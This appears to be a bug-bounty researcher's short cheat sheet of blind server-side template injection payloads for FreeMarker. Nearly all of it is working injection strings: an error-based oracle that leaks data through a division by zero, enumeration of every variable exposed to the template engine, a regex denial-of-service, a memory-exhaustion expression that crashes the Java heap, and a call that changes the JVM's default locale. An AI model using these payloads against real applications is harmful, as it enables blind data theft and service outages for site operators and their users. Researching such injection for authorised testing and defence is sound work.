I recently stumbled on a blind SSTI injection on a bug bounty program (no output nor stack trace, only 500 status code on invalid syntax)
The version was up to date and it was not possible to RCE because the conf was following best practices and there is no public sandbox bypass on the latest version. So was it possible to do stuff anyway ? Yes I found some nice gadgets to enumerate all accessible variables from the engine, read data blindly or perform some DoS.
This is not meant to be complete, you will find classic payloads for freemarker on other cheat sheets this is only the new stuff from my research which is not public anywhere else
version: ${.version}
version from conf: ${.incompatible_improvements}${1/((.version?matches('2.3.*')?string('1','0')?eval))}some explanation: if the version matches the regex, it is converted to either the '1' or '0' string. ?eval then cast the string into an integer and we have our oracle ! if you divide 1 by 0 you have an error
${.data_model?keys?join(',')}
blind: ${1/(((.data_model?keys?join(','))?matches('^blabla.*')?string('1','0')?eval))}This looks simple, but it is very powerfull, it allows to list all variables exposed to the engine by developers ! no need to use a wordlist anymore ! If you are lucky you have custom objects exposed with sensitive methods
reDoS
${'totoooooooooooooooooooooooooo'?matches('t((.*)*)*x')?string}create huge list and raise java.lang.OutOfMemoryError: Java heap space
${(1..99999999999999999999999999)?join(',')}this one changes the JVM default locale :o)
not sure if it's a DoS but it was fun enough to mention here
${.locale_object.setDefault(.locale_object.forLanguageTag('jp'))}